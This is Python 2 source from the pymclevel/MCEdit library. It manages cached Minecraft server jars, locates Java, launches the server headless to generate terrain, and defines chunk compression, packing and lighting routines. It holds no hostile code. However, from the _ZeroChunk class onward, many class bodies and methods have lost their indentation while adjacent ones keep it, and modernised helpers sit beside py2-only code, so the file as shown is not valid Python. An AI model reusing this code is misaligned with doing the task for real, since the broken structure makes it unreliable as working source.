            candidate = os.path.join(entry, program)
            if _runnable(candidate):
                return candidate
    return None
# Per-platform application-support directory for pymclevel's caches.
if sys.platform == "win32":
    # appDataDir comes from mclevelbase -- presumably %APPDATA%; confirm.
    appSupportDir = os.path.join(appDataDir, u"pymclevel")
elif sys.platform == "darwin":
    appSupportDir = os.path.expanduser(u"~/Library/Application Support/pymclevel/")
else:
    appSupportDir = os.path.expanduser(u"~/.pymclevel")
class ServerJarStorage(object):
    """Manages a cache directory of minecraft_server.jar files, one
    subfolder per server version, used for terrain generation."""
    defaultCacheDir = os.path.join(appSupportDir, u"ServerJarStorage")
    def __init__(self, cacheDir=None):
        """Create/open the cache folder, write an explanatory README on
        first use, and scan for available server versions."""
        if cacheDir is None:
            cacheDir = self.defaultCacheDir
        self.cacheDir = cacheDir
        if not os.path.exists(self.cacheDir):
            os.makedirs(self.cacheDir)
        readme = os.path.join(self.cacheDir, "README.TXT")
        if not os.path.exists(readme):
            with file(readme, "w") as f:
                f.write("""
About this folder:
This folder is used by MCEdit and pymclevel to store different versions of the
Minecraft Server to use for terrain generation. It should have one or more
subfolders, one for each version of the server. Each subfolder must hold at
least one file named minecraft_server.jar, and the subfolder's name should
have the server's version plus the names of any installed mods.
There may already be a subfolder here (for example, "Beta 1.7.3") if you have
used the Chunk Create feature in MCEdit to create chunks using the server.
Version numbers can be automatically detected. If you place one or more
minecraft_server.jar files in this folder, they will be placed automatically
into well-named subfolders the next time you run MCEdit. If a file's name
begins with "minecraft_server" and ends with ".jar", it will be detected in
this way.
""")
        self.reloadVersions()
    def reloadVersions(self):
        """Rescan the cache dir for version subfolders and classify any
        loose minecraft_server.jar files into new version folders."""
        cacheDirList = os.listdir(self.cacheDir)
        self.versions = list(reversed(sorted([v for v in cacheDirList if os.path.exists(self.jarfileForVersion(v))], key=alphanum_key)))
        if MCServerChunkGenerator.javaExe:
            for f in cacheDirList:
                p = os.path.join(self.cacheDir, f)
                if f.startswith("minecraft_server") and f.endswith(".jar") and os.path.isfile(p):
                    print "Unclassified minecraft_server.jar found in cache dir. Discovering version number..."
                    self.cacheNewVersion(p)
                    os.remove(p)
        print "Minecraft_Server.jar storage initialized."
        print u"Each server is stored in a subdirectory of {0} named with the server's version number".format(self.cacheDir)
        print "Cached servers: ", self.versions
    def downloadCurrentServer(self):
        """Fetch the latest server jar from minecraft.net into the cache.
        Download errors are printed and swallowed."""
        print "Downloading the latest Minecraft Server..."
        try:
            (filename, headers) = urllib.urlretrieve("http://www.minecraft.net/download/minecraft_server.jar")
        except Exception, e:
            print "Error downloading server: {0!r}".format(e)
            return
        self.cacheNewVersion(filename, allowDuplicate=False)
    def cacheNewVersion(self, filename, allowDuplicate=True):
        """ Finds the version number from the server jar at filename and copies
        it into the proper subfolder of the server jar cache folder"""
        version = MCServerChunkGenerator._serverVersionFromJarFile(filename)
        print "Found version ", version
        versionDir = os.path.join(self.cacheDir, version)
        # If a folder for this version exists, either bail out (duplicates
        # disallowed) or probe for a free "version (n)" suffix.
        i = 1
        newVersionDir = versionDir
        while os.path.exists(newVersionDir):
            if not allowDuplicate: return
            newVersionDir = versionDir + " (" + str(i) + ")"
            i += 1
        os.mkdir(newVersionDir)
        shutil.copy2(filename, os.path.join(newVersionDir, "minecraft_server.jar"))
        if version not in self.versions:
            self.versions.append(version)
    def jarfileForVersion(self, v):
        """Filesystem-encoded path to the jar cached for version *v*."""
        return os.path.join(self.cacheDir, v, "minecraft_server.jar").encode(sys.getfilesystemencoding())
    def checksumForVersion(self, v):
        """MD5 hex digest of the cached jar for version *v*."""
        jf = self.jarfileForVersion(v)
        with file(jf, "rb") as f:
            import hashlib
            return (hashlib.md5(f.read()).hexdigest())
    # Known-bad server builds that latestVersion must never select.
    broken_versions = ["Beta 1.9 Prerelease {0}".format(i) for i in (1,2,3)]
    @property
    def latestVersion(self):
        """Highest usable cached version (natural ordering), or None."""
        if len(self.versions) == 0: return None
        return max( (v for v in self.versions if v not in self.broken_versions), key=alphanum_key)
    def getJarfile(self, version=None):
        """Jar path for *version* (default: latest), downloading the
        current server first when the cache is empty; None if unavailable."""
        if len(self.versions) == 0:
            print "No servers found in cache."
            self.downloadCurrentServer()
        version = version or self.latestVersion
        if version not in self.versions: return None
        return self.jarfileForVersion(version)
class JavaNotFound(RuntimeError):
    """Raised when no Java executable can be located."""
class VersionNotFound(RuntimeError):
    """Raised when no server jar matching the requested version exists."""
def readProperties(filename):
    """Parse a Java-style .properties file into a dict.

    Each line is split on the FIRST '=' only, so values may themselves
    contain '=' characters.  Comment lines starting with '#', blank
    lines, and lines without an '=' are skipped.  Returns {} when the
    file does not exist.
    """
    if not os.path.exists(filename):
        return {}
    properties = {}
    # open() replaces the removed/deprecated py2 builtin file().
    with open(filename) as f:
        for line in f:
            line = line.strip()
            # BUG FIX: the old code used line.split("=", 2) inside dict(),
            # which raised ValueError for values containing '=' and for
            # blank/separator-less lines.  Split at the first '=' only.
            if line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            properties[key] = value
    return properties
def saveProperties(filename, properties):
    """Write *properties* to *filename* as "key=value" lines.

    Existing file contents are replaced.  Values are not escaped; they
    are written exactly as given, one entry per line.
    """
    # open() replaces the removed/deprecated py2 builtin file(), and
    # items() replaces py2-only iteritems(); behavior is identical.
    with open(filename, "w") as f:
        for k, v in properties.items():
            f.write("{0}={1}\n".format(k, v))
def findJava():
    """Locate a Java executable.

    On Windows, tries PATH first and then reads JavaHome out of the
    registry via ``REG QUERY``.  Elsewhere it simply searches PATH.
    Returns the executable path, or None when Java cannot be found.
    """
    if sys.platform == "win32":
        javaExe = which("java.exe")
        if javaExe is None:
            # NOTE(review): the backslashes happen to be literal here (none
            # forms a valid escape), but a raw string would be safer.
            KEY_NAME = "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment"
            try:
                # First query: the current JRE version number.
                p = subprocess.Popen(["REG", "QUERY", KEY_NAME, "/v", "CurrentVersion"], stdout=subprocess.PIPE, universal_newlines=True)
                o, e = p.communicate()
                lines = o.split("\n")
                for l in lines:
                    l = l.strip()
                    if l.startswith("CurrentVersion"):
                        words = l.split(None, 2)
                        version = words[-1]
                        # Second query: the JavaHome folder for that version.
                        p = subprocess.Popen(["REG", "QUERY", KEY_NAME + "\\" + version, "/v", "JavaHome"], stdout=subprocess.PIPE, universal_newlines=True)
                        o, e = p.communicate()
                        lines = o.split("\n")
                        for l in lines:
                            l = l.strip()
                            if l.startswith("JavaHome"):
                                w = l.split(None, 2)
                                javaHome = w[-1]
                                javaExe = os.path.join(javaHome, "bin", "java.exe")
                                print "RegQuery: java.exe found at ", javaExe
                                break
            except Exception, e:
                # Registry lookup is best-effort; report and return None.
                print "Error while locating java.exe using the Registry: ", repr(e)
    else:
        javaExe = which("java")
    return javaExe
class MCServerChunkGenerator(object):
    """Generates chunks using minecraft_server.jar. Uses a ServerJarStorage to
    store different versions of minecraft_server.jar in an application support
    folder.
    from pymclevel import *
    Example usage:
    gen = MCServerChunkGenerator() # with no arguments, use the newest
    # server version in the cache, or download
    # the newest one automatically
    level = loadWorldNamed("MyWorld")
    gen.generateChunkInLevel(level, 12, 24)
    Using an older version:
    gen = MCServerChunkGenerator("Beta 1.6.5")
    """
    # Shared ServerJarStorage, created lazily by getDefaultJarStorage().
    defaultJarStorage = None
    # Resolved once at import time; None means Java is unavailable.
    javaExe = findJava()
    jarStorage = None
    # (serverVersion, RandomSeed) -> scratch world reused across runs.
    tempWorldCache = {}
    def __init__(self, version=None, jarfile=None, jarStorage=None):
        """Select a server jar by explicit path or by version lookup.
        Raises JavaNotFound / VersionNotFound accordingly."""
        self.jarStorage = jarStorage or self.getDefaultJarStorage()
        if self.javaExe is None:
            raise JavaNotFound, "Could not find java. Please check that java is installed correctly. (Could not find java in your PATH environment variable.)"
        if jarfile is None:
            jarfile = self.jarStorage.getJarfile(version)
        if jarfile is None:
            raise VersionNotFound, "Could not find minecraft_server.jar for version {0}. Please make sure that a minecraft_server.jar is placed under {1} in a subfolder named after the server's version number.".format(version or "(latest)", self.jarStorage.cacheDir)
        self.serverJarFile = jarfile
        self.serverVersion = version or self._serverVersion()
    @classmethod
    def getDefaultJarStorage(cls):
        """Lazily create and reuse the shared ServerJarStorage."""
        if cls.defaultJarStorage is None:
            cls.defaultJarStorage = ServerJarStorage()
        return cls.defaultJarStorage
    @classmethod
    def clearWorldCache(cls):
        """Drop the in-memory world cache and delete cached world dirs."""
        cls.tempWorldCache = {}
        for tempDir in os.listdir(cls.worldCacheDir):
            t = os.path.join(cls.worldCacheDir, tempDir)
            if os.path.isdir(t):
                shutil.rmtree(t)
    def createReadme(self):
        """Write an explanatory README into the world cache dir (once)."""
        readme = os.path.join(self.worldCacheDir, "README.TXT")
        if not os.path.exists(readme):
            with file(readme, "w") as f:
                f.write("""
About this folder:
This folder is used by MCEdit and pymclevel to cache levels during terrain
generation. Feel free to delete it for any reason.
""")
    worldCacheDir = os.path.join(tempfile.gettempdir(), "pymclevel_MCServerChunkGenerator")
    def tempWorldForLevel(self, level):
        """Return (tempWorld, tempDir): a scratch server world matching
        *level*'s seed and dimension, cached per (version, seed)."""
        #tempDir = tempfile.mkdtemp("mclevel_servergen")
        tempDir = os.path.join(self.worldCacheDir, self.jarStorage.checksumForVersion(self.serverVersion), str(level.RandomSeed))
        propsFile = os.path.join(tempDir, "server.properties")
        properties = readProperties(propsFile)
        tempWorld = self.tempWorldCache.get((self.serverVersion, level.RandomSeed))
        if tempWorld is None:
            if not os.path.exists(tempDir):
                os.makedirs(tempDir)
            self.createReadme()
            worldName = "world"
            worldName = properties.setdefault("level-name", worldName)
            tempWorldDir = os.path.join(tempDir, worldName)
            tempWorld = MCInfdevOldLevel(tempWorldDir, create=True, random_seed=level.RandomSeed)
            del tempWorld.version # for compatibility with older servers. newer ones will set it again without issue.
            self.tempWorldCache[self.serverVersion, level.RandomSeed] = tempWorld
        if level.dimNo == 0:
            properties["allow-nether"] = "false"
        else:
            tempWorld = tempWorld.getDimension(level.dimNo)
            properties["allow-nether"] = "true"
        # Random high port so we don't collide with a real server instance.
        properties["server-port"] = int(32767 + random.random() * 32700)
        saveProperties(propsFile, properties)
        return (tempWorld, tempDir)
    def generateAtPosition(self, tempWorld, tempDir, cx, cz):
        """Blocking wrapper around generateAtPositionIter."""
        return exhaust(self.generateAtPositionIter(tempWorld, tempDir, cx, cz))
    def generateAtPositionIter(self, tempWorld, tempDir, cx, cz, simulate = False):
        """Run the server against *tempWorld* with the spawn set at chunk
        (cx, cz); yields server log/progress lines.  With *simulate*, lets
        the server keep running briefly to process tile ticks."""
        tempWorld.setPlayerSpawnPosition((cx * 16, 64, cz * 16))
        tempWorld.saveInPlace()
        tempWorld.unloadRegions()
        startTime = time.time()
        proc = self.runServer(tempDir)
        while proc.poll() is None:
            line = proc.stderr.readline().strip()
            info(line)
            yield line
            # Server prints "[INFO] Done" once spawn-area generation ends.
            if "[INFO] Done" in line:
                if simulate:
                    duration = time.time() - startTime
                    simSeconds = int(duration) + 1
                    for i in range(simSeconds):
                        # process tile ticks
                        yield "%2d/%2d: Simulating the world for a little bit..." % (i, simSeconds)
                        time.sleep(1)
                proc.stdin.write("stop\n")
                proc.wait()
                break
            if "FAILED TO BIND" in line:
                proc.kill()
                proc.wait()
                raise RuntimeError, "Server failed to bind to port!"
        stdout, _ = proc.communicate()
        # JVM could not allocate its heap: retry once with default flags.
        if "Could not reserve enough space" in stdout and not MCServerChunkGenerator.lowMemory:
            MCServerChunkGenerator.lowMemory = True
            for i in self.generateAtPositionIter(tempWorld, tempDir, cx, cz):
                yield i
        (tempWorld.parentWorld or tempWorld).loadLevelDat() #reload version number
    def copyChunkAtPosition(self, tempWorld, level, cx, cz):
        """Copy chunk (cx, cz) from *tempWorld* into *level* by swapping
        the freshly generated NBT tree into a newly created chunk."""
        if level.containsChunk(cx, cz): return
        try:
            tempChunk = tempWorld.getChunk(cx, cz)
        except ChunkNotPresent, e:
            raise ChunkNotPresent, "While generating a world in {0} using server {1} ({2!r})".format(tempWorld, self.serverJarFile, e), sys.exc_traceback
        tempChunk.decompress()
        tempChunk.unpackChunkData()
        root_tag = tempChunk.root_tag
        if not level.containsChunk(cx, cz):
            level.createChunk(cx, cz)
        chunk = level.getChunk(cx, cz)
        chunk.decompress()
        chunk.unpackChunkData()
        chunk.root_tag = root_tag #xxx tag swap, could copy blocks and entities and chunk attrs instead?
        chunk.dirty = True
        chunk.compress()
        chunk.save()
        chunk.unload()
        tempChunk.compress()
        tempChunk.unload()
    def generateChunkInLevel(self, level, cx, cz):
        """Generate a single chunk of *level* using the server."""
        assert isinstance(level, MCInfdevOldLevel)
        tempWorld, tempDir = self.tempWorldForLevel(level)
        self.generateAtPosition(tempWorld, tempDir, cx, cz)
        self.copyChunkAtPosition(tempWorld, level, cx, cz)
    # Chunk radii: minRadius is the area assumed generated per server run,
    # maxRadius the area scanned for chunks to copy back.
    minRadius = 5
    maxRadius = 20
    def createLevel(self, level, box, simulate = False, **kw):
        """Blocking wrapper around createLevelIter."""
        return exhaust(self.createLevelIter(level, box, simulate, **kw))
    def createLevelIter(self, level, box, simulate = False, **kw):
        """Create (or open) *level* and generate every chunk inside *box*,
        stepping the spawn across the box; yields (i, total, line)."""
        if isinstance(level, basestring):
            filename = level
            level = MCInfdevOldLevel(filename, create=True, **kw)
        assert isinstance(level, MCInfdevOldLevel)
        minRadius = self.minRadius
        genPositions = list(itertools.product(
            xrange(box.mincx, box.maxcx, minRadius * 2),
            xrange(box.mincz, box.maxcz, minRadius * 2)))
        for i, (cx,cz) in enumerate(genPositions):
            info("Generating at %s" % ((cx,cz),))
            parentDir = dirname(level.worldDir)
            propsFile = join(parentDir, "server.properties")
            props = readProperties(join(dirname(self.serverJarFile), "server.properties"))
            props["level-name"] = basename(level.worldDir)
            props["server-port"] = int(32767 + random.random() * 32700)
            saveProperties(propsFile, props)
            for p in self.generateAtPositionIter(level, parentDir, cx, cz, simulate):
                yield i, len(genPositions), p
        level.unloadRegions()
    def generateChunksInLevel(self, level, chunks):
        """Blocking wrapper around generateChunksInLevelIter."""
        return exhaust(self.generateChunksInLevelIter(level, chunks))
    def generateChunksInLevelIter(self, level, chunks, simulate = False):
        """Generate the given chunk coordinates in *level*: repeatedly aim
        the server at an ungenerated spot, copy back whatever populated
        chunks it produced; yields (done, total[, log line])."""
        assert isinstance(level, MCInfdevOldLevel)
        tempWorld, tempDir = self.tempWorldForLevel(level)
        startLength = len(chunks)
        minRadius = self.minRadius
        maxRadius = self.maxRadius
        chunks = set(chunks)
        while len(chunks):
            length = len(chunks)
            centercx, centercz = chunks.pop()
            chunks.add((centercx, centercz))
            #assume the generator always generates at least an 11x11 chunk square.
            centercx += minRadius
            centercz += minRadius
            #boxedChunks = [cPos for cPos in chunks if inBox(cPos)]
            print "Generating {0} chunks out of {1} starting from {2}".format("XXX", len(chunks), (centercx, centercz))
            yield startLength - len(chunks), startLength
            #chunks = [c for c in chunks if not inBox(c)]
            for p in self.generateAtPositionIter(tempWorld, tempDir, centercx, centercz, simulate):
                yield startLength - len(chunks), startLength, p
            i=0
            # Harvest every requested, fully populated chunk near the spawn.
            for cx, cz in itertools.product(
                xrange(centercx-maxRadius, centercx+maxRadius),
                xrange(centercz-maxRadius, centercz+maxRadius)):
                if level.containsChunk(cx,cz):
                    chunks.discard((cx,cz))
                elif ((cx,cz) in chunks
                    and tempWorld.containsChunk(cx, cz)
                    and tempWorld.getChunk(cx,cz).TerrainPopulated
                    ):
                    self.copyChunkAtPosition(tempWorld, level, cx, cz)
                    i+= 1
                    chunks.discard((cx,cz))
                    yield startLength - len(chunks), startLength
            # No progress means the server is not generating here; give up.
            if length == len(chunks):
                print "No chunks were generated. Aborting."
                break
        level.saveInPlace()
    def runServer(self, startingDir):
        """Start this generator's server jar in *startingDir*."""
        return self._runServer(startingDir, self.serverJarFile)
    # Set once a launch fails on heap allocation; retried without -Xmx/-Xms.
    lowMemory = False
    @classmethod
    def _runServer(cls, startingDir, jarfile):
        """Spawn a headless server process with fully piped stdio."""
        info("Starting server %s in %s", jarfile, startingDir)
        if cls.lowMemory: memflags = []
        else: memflags = ["-Xmx1024M", "-Xms1024M", ]
        proc = subprocess.Popen([cls.javaExe, "-Djava.awt.headless=true"] + memflags + ["-jar", jarfile],
            executable=cls.javaExe,
            cwd=startingDir,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            universal_newlines=True,
            )
        return proc
    def _serverVersion(self):
        """Version string detected from this generator's jar."""
        return self._serverVersionFromJarFile(self.serverJarFile)
    @classmethod
    def _serverVersionFromJarFile(cls, jarfile):
        """Launch *jarfile* in a throwaway dir just long enough to read its
        "Starting minecraft server version ..." banner, kill it, and
        classify bare numbers as Alpha/Release."""
        tempdir = tempfile.mkdtemp("mclevel_servergen")
        proc = cls._runServer(tempdir, jarfile)
        version = "Unknown"
        #out, err = proc.communicate()
        #for line in err.split("\n"):
        while proc.poll() is None:
            line = proc.stderr.readline()
            if "Preparing start region" in line: break
            if "Starting minecraft server version" in line:
                version = line.split("Starting minecraft server version")[1].strip()
                break
        if proc.returncode is None:
            try:
                proc.kill()
            except WindowsError:
                # NOTE(review): WindowsError is undefined off Windows; a
                # kill() failure there would surface as a NameError.
                pass #access denied, process already terminated
            proc.wait()
        shutil.rmtree(tempdir)
        if ";)" in version: version = version.replace(";)", "") #Damnit, Jeb!
        # Versions like "0.2.1" are alphas, and versions like "1.0.0" without "Beta" are releases
        if version[0] == "0":
            version = "Alpha " + version
        try:
            if int(version[0]) > 0:
                version = "Release " + version
        except ValueError:
            pass
        return version
# Cache of placeholder chunks, keyed by world height.
_zeros = {}
def ZeroChunk(height=512):
    """Return a (cached) all-air placeholder chunk of the given height."""
    try:
        return _zeros[height]
    except KeyError:
        chunk = _ZeroChunk(height)
        _zeros[height] = chunk
        return chunk
class _ZeroChunk(object):
" a placebo for neighboring-chunk routines "
def compress(self): pass
def load(self): pass
def __init__(self, height=512):
zeroChunk = zeros((16, 16, height), uint8)
whiteLight = zeroChunk + 15;
self.Blocks = zeroChunk
self.BlockLight = whiteLight
self.SkyLight = whiteLight
self.Data = zeroChunk
class InfdevChunk(EntityLevel):
""" This is a 16x16xH chunk in an (infinite) world.
The properties Blocks, Data, SkyLight, BlockLight, and Heightmap
are ndarrays containing the respective blocks in the chunk file.
Each array is indexed [x,z,y]. The Data, Skylight, and BlockLight
arrays are automatically unpacked from nibble arrays into byte arrays
for better handling.
"""
    @property
    def filename(self):
        """Human-readable storage location of this chunk.
        Region worlds describe the slot inside the region file rather than
        a real path; legacy worlds return the actual chunk file path."""
        if self.world.version:
            cx, cz = self.chunkPosition
            # Regions hold 32x32 chunks: rx,rz select the region file,
            # cx & 0x1f / cz & 0x1f the slot within it.
            rx, rz = cx >> 5, cz >> 5
            rf = self.world.regionFiles[rx, rz]
            offset = rf.getOffset(cx & 0x1f, cz & 0x1f)
            # offset packs the sector number (high bits) and length (low
            # byte) -- presumably in 4KiB sectors; confirm in MCRegionFile.
            return u"{region} index {index} sector {sector} length {length} format {format}".format(
                region=os.path.basename(self.world.regionFilename(rx, rz)),
                sector=offset >> 8,
                length = offset & 0xff,
                index=4 * ((cx & 0x1f) + ((cz & 0x1f) * 32)),
                format=["???", "gzip", "deflate"][self.compressMode])
        else:
            return self.chunkFilename
dirty = False;
needsLighting = False
compressedTag = None
root_tag = None
def __init__(self, world, chunkPosition, create=False):
self.world = world;
self.chunkPosition = chunkPosition;
self.chunkFilename = world.chunkFilename(*chunkPosition)
if self.world.version:
self.compressMode = MCRegionFile.VERSION_DEFLATE
else:
self.compressMode = MCRegionFile.VERSION_GZIP
if create:
self.create();
else:
if not world.containsChunk(*chunkPosition):
raise ChunkNotPresent("Chunk {0} not found", self.chunkPosition)
    @property
    def materials(self):
        """The material set (block definitions) of the owning world."""
        return self.world.materials
@classmethod
def compressTagGzip(cls, root_tag):
buf = StringIO()
with closing(gzip.GzipFile(fileobj=buf, mode='wb', compresslevel=2)) as gzipper:
root_tag.save(buf=gzipper)
return buf.getvalue()
@classmethod
def compressTagDeflate(cls, root_tag):
buf = StringIO()
root_tag.save(buf=buf)
return deflate(buf.getvalue())
def _compressChunk(self):
root_tag = self.root_tag
if root_tag is None: return
if self.compressMode == MCRegionFile.VERSION_GZIP:
self.compressedTag = self.compressTagGzip(root_tag)
if self.compressMode == MCRegionFile.VERSION_DEFLATE:
self.compressedTag = self.compressTagDeflate(root_tag)
self.root_tag = None
    def decompressTagGzip(self, data):
        """Parse an NBT tree from gzip-compressed bytes."""
        return nbt.load(buf=gunzip(data))
    def decompressTagDeflate(self, data):
        """Parse an NBT tree from deflate-compressed bytes."""
        return nbt.load(buf=inflate(data))
def _decompressChunk(self):
data = self.compressedTag
if self.compressMode == MCRegionFile.VERSION_GZIP:
self.root_tag = self.decompressTagGzip(data)
if self.compressMode == MCRegionFile.VERSION_DEFLATE:
self.root_tag = self.decompressTagDeflate(data)
def compressedSize(self):
"return the size of the compressed data for this level, in bytes."
self.compress();
if self.compressedTag is None: return 0
return len(self.compressedTag)
    def sanitizeBlocks(self):
        """Fix invalid vertical stackings before data reaches Minecraft."""
        #change grass to dirt where needed so Minecraft doesn't flip out and die
        # Mask marks grass-or-dirt cells; wherever two such cells are
        # stacked, the lower one cannot legitimately stay grass.
        grass = self.Blocks == self.materials.Grass.ID
        grass |= self.Blocks == self.materials.Dirt.ID
        badgrass = grass[:, :, 1:] & grass[:, :, :-1]
        self.Blocks[:, :, :-1][badgrass] = self.materials.Dirt.ID
        #remove any thin snow layers immediately above other thin snow layers.
        #minecraft doesn't flip out, but it's almost never intended
        if hasattr(self.materials, "SnowLayer"):
            snowlayer = self.Blocks == self.materials.SnowLayer.ID
            badsnow = snowlayer[:, :, 1:] & snowlayer[:, :, :-1]
            # The upper of two stacked snow layers becomes air.
            self.Blocks[:, :, 1:][badsnow] = self.materials.Air.ID
def compress(self):
if not self.dirty:
#if we are not dirty, just throw the
#uncompressed tag structure away. rely on the OS disk cache.
self.root_tag = None
else:
if self.root_tag is not None:
self.sanitizeBlocks() #xxx
self.packChunkData()
self._compressChunk()
self.world.chunkDidCompress(self);
    def decompress(self):
        """called when accessing attributes decorated with @decompress_first"""
        # Skip work when a decompressed copy is already queued elsewhere.
        if not self in self.world.decompressedChunkQueue:
            if self.root_tag != None: return
            if self.compressedTag is None:
                if self.root_tag is None:
                    # Nothing in memory at all: pull the chunk from disk.
                    self.load();
                else:
                    return;
            try:
                self._decompressChunk()
            except Exception, e:
                error(u"Malformed NBT data in file: {0} ({1})".format(self.filename, e))
                if self.world: self.world.malformedChunk(*self.chunkPosition);
                # Re-raise as ChunkMalformed, preserving the traceback.
                raise ChunkMalformed, (e,), sys.exc_info()[2]
            try:
                self.shapeChunkData()
            except KeyError, e:
                error(u"Incorrect chunk format in file: {0} ({1})".format(self.filename, e))
                if self.world: self.world.malformedChunk(*self.chunkPosition);
                raise ChunkMalformed, (e,), sys.exc_info()[2]
            self.dataIsPacked = True;
            self.world.chunkDidDecompress(self);
def __str__(self):
return u"InfdevChunk, coords:{0}, world: {1}, D:{2}, L:{3}".format(self.chunkPosition, self.world.displayName, self.dirty, self.needsLighting)
    def create(self):
        """Build a brand-new, empty chunk tag tree for this position and
        save it immediately.

        Fills Blocks/Data/light arrays with zeros (SkyLight fully lit),
        installs empty Entities/TileEntities lists, and marks the chunk
        TerrainPopulated so the game will not regenerate features."""
        (cx, cz) = self.chunkPosition;
        chunkTag = nbt.TAG_Compound()
        chunkTag.name = ""
        levelTag = nbt.TAG_Compound()
        chunkTag[Level] = levelTag
        levelTag[TerrainPopulated] = TAG_Byte(1)
        levelTag[xPos] = TAG_Int(cx)
        levelTag[zPos] = TAG_Int(cz)
        levelTag[LastUpdate] = TAG_Long(0);
        # light and Data arrays hold one nibble per block -> Height / 2 bytes per column
        levelTag[BlockLight] = TAG_Byte_Array()
        levelTag[BlockLight].value = zeros(16 * 16 * self.world.Height / 2, uint8)
        levelTag[Blocks] = TAG_Byte_Array()
        levelTag[Blocks].value = zeros(16 * 16 * self.world.Height, uint8)
        levelTag[Data] = TAG_Byte_Array()
        levelTag[Data].value = zeros(16 * 16 * self.world.Height / 2, uint8)
        levelTag[SkyLight] = TAG_Byte_Array()
        levelTag[SkyLight].value = zeros(16 * 16 * self.world.Height / 2, uint8)
        # 0xff = both packed nibbles at full sky light
        levelTag[SkyLight].value[:] = 255
        # taller worlds need a wider HeightMap element type
        if self.world.Height <= 256:
            levelTag[HeightMap] = TAG_Byte_Array()
            levelTag[HeightMap].value = zeros(16 * 16, uint8)
        else:
            levelTag[HeightMap] = TAG_Int_Array()
            levelTag[HeightMap].value = zeros(16 * 16, uint32).newbyteorder()
        levelTag[Entities] = TAG_List()
        levelTag[TileEntities] = TAG_List()
        #levelTag["Creator"] = TAG_String("MCEdit-" + release.release);
        #empty lists are seen in the wild with a list.TAG_type for a list of single bytes,
        #even though these contain TAG_Compounds
        self.root_tag = chunkTag
        self.shapeChunkData();
        self.dataIsPacked = True;
        self.dirty = True;
        self.save();
def save(self):
""" does not recalculate any data or light """
self.compress()
if self.dirty:
debug(u"Saving chunk: {0}".format(self))
self.world._saveChunk(self)
debug(u"Saved chunk {0}".format(self))
self.dirty = False;
    def load(self):
        """ If the chunk is unloaded, calls world._loadChunk to set root_tag and
        compressedTag, then unpacks the chunk fully.

        Raises ChunkMalformed (preserving the original traceback) if the
        on-disk data cannot be shaped/unpacked, after notifying the world."""
        if self.root_tag is None and self.compressedTag is None:
            try:
                self.world._loadChunk(self)
                self.dataIsPacked = True;
                self.shapeChunkData()
                self.unpackChunkData()
            except Exception, e:
                error(u"Incorrect chunk format in file: {0} ({1})".format(self.filename, e))
                if self.world: self.world.malformedChunk(*self.chunkPosition);
                raise ChunkMalformed, (e,), sys.exc_info()[2]
            # let the world track load/decompress statistics
            self.world.chunkDidLoad(self)
            self.world.chunkDidDecompress(self);
def unload(self):
""" Frees the chunk's memory. Will not save to disk. Unloads completely
if the chunk does not need to be saved."""
self.compress();
if not self.dirty:
self.compressedTag = None;
self.world.chunkDidUnload(self)
def isLoaded(self):
#we're loaded if we have our tag data in ram
#and we don't have to go back to the disk for it.
return not (self.compressedTag is None and self.root_tag is None)
def isCompressed(self):
return self.isLoaded() and self.root_tag == None
    def generateHeightMap(self):
        # Delegates to the module-level helper with this chunk's materials,
        # block array and height map.
        # NOTE(review): presumably extractLightMap rewrites self.HeightMap
        # in place from the Blocks array -- confirm the helper's contract.
        extractLightMap(self.materials, self.Blocks, self.HeightMap)
def chunkChanged(self, calcLighting=True):
""" You are required to call this function after you are done modifying
the chunk. Pass False for calcLighting if you know your changes will
not change any lights."""
if not self.isLoaded(): return;
self.dirty = True;
self.needsLighting = calcLighting or self.needsLighting;
self.generateHeightMap();
if calcLighting:
self.genFastLights()
    def genFastLights(self):
        """Quick, chunk-local sky light approximation.

        Sets full light (15) above each column's height map entry, then
        attenuates downward through the column by each block's light
        absorption. The Nether and the End get no sky light at all."""
        self.SkyLight[:] = 0;
        if self.world.dimNo in (-1, 1):
            return #no light in nether or the end
        blocks = self.Blocks;
        la = self.world.materials.lightAbsorption
        skylight = self.SkyLight;
        heightmap = self.HeightMap;
        # NOTE: HeightMap is indexed [z, x] while the light arrays are [x, z, y]
        for x, z in itertools.product(xrange(16), xrange(16)):
            skylight[x, z, heightmap[z, x]:] = 15
            lv = 15;
            for y in reversed(range(heightmap[z, x])):
                # every block absorbs at least 1 light level
                lv -= (la[blocks[x, z, y]] or 1)
                if lv <= 0:
                    break;
                skylight[x, z, y] = lv;
    def unpackChunkData(self):
        """Expand the 4-bit-packed SkyLight, BlockLight and Data arrays to
        one byte per block (low nibble -> even y, high nibble -> odd y).
        Inverse of packChunkData; no-op when already unpacked."""
        if not self.dataIsPacked: return
        """ for internal use. call getChunk and compressChunk to load, compress, and unpack chunks automatically """
        for key in (SkyLight, BlockLight, Data):
            dataArray = self.root_tag[Level][key].value
            s = dataArray.shape
            assert s[2] == self.world.Height / 2;
            #unpackedData = insert(dataArray[...,newaxis], 0, 0, 3)
            unpackedData = zeros((s[0], s[1], s[2] * 2), dtype='uint8')
            # even y levels take the low nibble, odd y levels the high nibble
            unpackedData[:, :, ::2] = dataArray
            unpackedData[:, :, ::2] &= 0xf
            unpackedData[:, :, 1::2] = dataArray
            unpackedData[:, :, 1::2] >>= 4
            self.root_tag[Level][key].value = unpackedData
        self.dataIsPacked = False;
    def packChunkData(self):
        """Pack the byte-per-block SkyLight, BlockLight and Data arrays
        back into the on-disk 4-bit form (two y levels per byte).
        Inverse of unpackChunkData; no-op when already packed."""
        if self.dataIsPacked: return
        if self.root_tag is None:
            warn(u"packChunkData called on unloaded chunk: {0}".format(self.chunkPosition))
            return;
        for key in (SkyLight, BlockLight, Data):
            dataArray = self.root_tag[Level][key].value
            assert dataArray.shape[2] == self.world.Height;
            # view pairs of adjacent y levels, then merge the pair into one byte:
            # odd level in the high nibble, even level in the low nibble
            unpackedData = self.root_tag[Level][key].value.reshape(16, 16, self.world.Height / 2, 2)
            unpackedData[..., 1] <<= 4
            unpackedData[..., 1] |= unpackedData[..., 0]
            self.root_tag[Level][key].value = array(unpackedData[:, :, :, 1])
        self.dataIsPacked = True;
    def shapeChunkData(self):
        """Applies the chunk shape to all of the data arrays
        in the chunk tag. used by chunk creation and loading.

        The first chunk seen also fixes the world's Height from the
        length of its Blocks array. Ensures Entities/TileEntities lists
        exist."""
        chunkTag = self.root_tag
        chunkSize = 16
        if not hasattr(self.world, 'HeightOverride'):
            # derive world height from the flat Blocks array length
            length = chunkTag[Level][Blocks].value.ravel().shape[0]
